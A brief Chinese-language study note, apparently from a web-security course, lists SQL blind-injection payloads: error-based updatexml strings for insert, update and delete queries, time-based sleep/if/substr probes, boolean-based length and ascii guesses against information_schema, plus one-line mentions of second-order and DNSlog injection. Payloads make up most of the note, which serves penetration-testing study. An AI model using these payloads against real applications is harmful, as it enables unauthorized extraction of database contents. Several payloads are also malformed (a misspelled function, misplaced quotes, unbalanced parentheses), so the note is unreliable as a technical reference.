小迪安全|sql盲注一些知识点

基于报错的sql盲注（报错回显）

1.insert

'or updatexml(1,concat(0x7e,database(),0x7e),0) or'

update语句（差不多）

'or updatexml(1,concat(0x7e,database(),0x7e),0) or'

delete

payload: or updatexml (1,concat(0x7e,datebase()),0)
且在BurpSuite中Ctrl+U 对payload进行url编码

基于时间的SQL盲注（时间盲注

参考:

if(condition,1,2)如果condition正确 返回1 错误返回2

like 'ros' #判断ro或ro...是否成立
regexp '^xiaodi [a-z]' #匹配xiaodi及xiaodi...等if(条件,5,0)
sleep (5) #sQL语句延时执行s秒
mid (a, b, c) #从位置b开始，截取a字符串的c位
substr( a,b, c) #从b位置开始，截取字符串a的c长度
left (database(),1), database() #left(a,b)从左侧截取a的前b位
length(database ())=8 #判断数据库database ()名的长度
ord=ascii ascii(x)=97 #判断x的ascii码是否等于97

猜数据库长度

sleep(if(length(database()='8'),3,0)

猜表名

sleep(if(database()=''),3,0)

猜表名

if(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='r',sleep(3),0)--+

布尔盲注（逻辑判断

and length(database())=8--+

and left(database(),1)>a and left(database(),2)>sa 一位一位猜

and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)=101--+

加解密注入

把语句加密后再进行注入

二次注入

二次注入一般是用于白盒测试、黑盒测试就算是找到注入也没办法攻击。

dnslog注入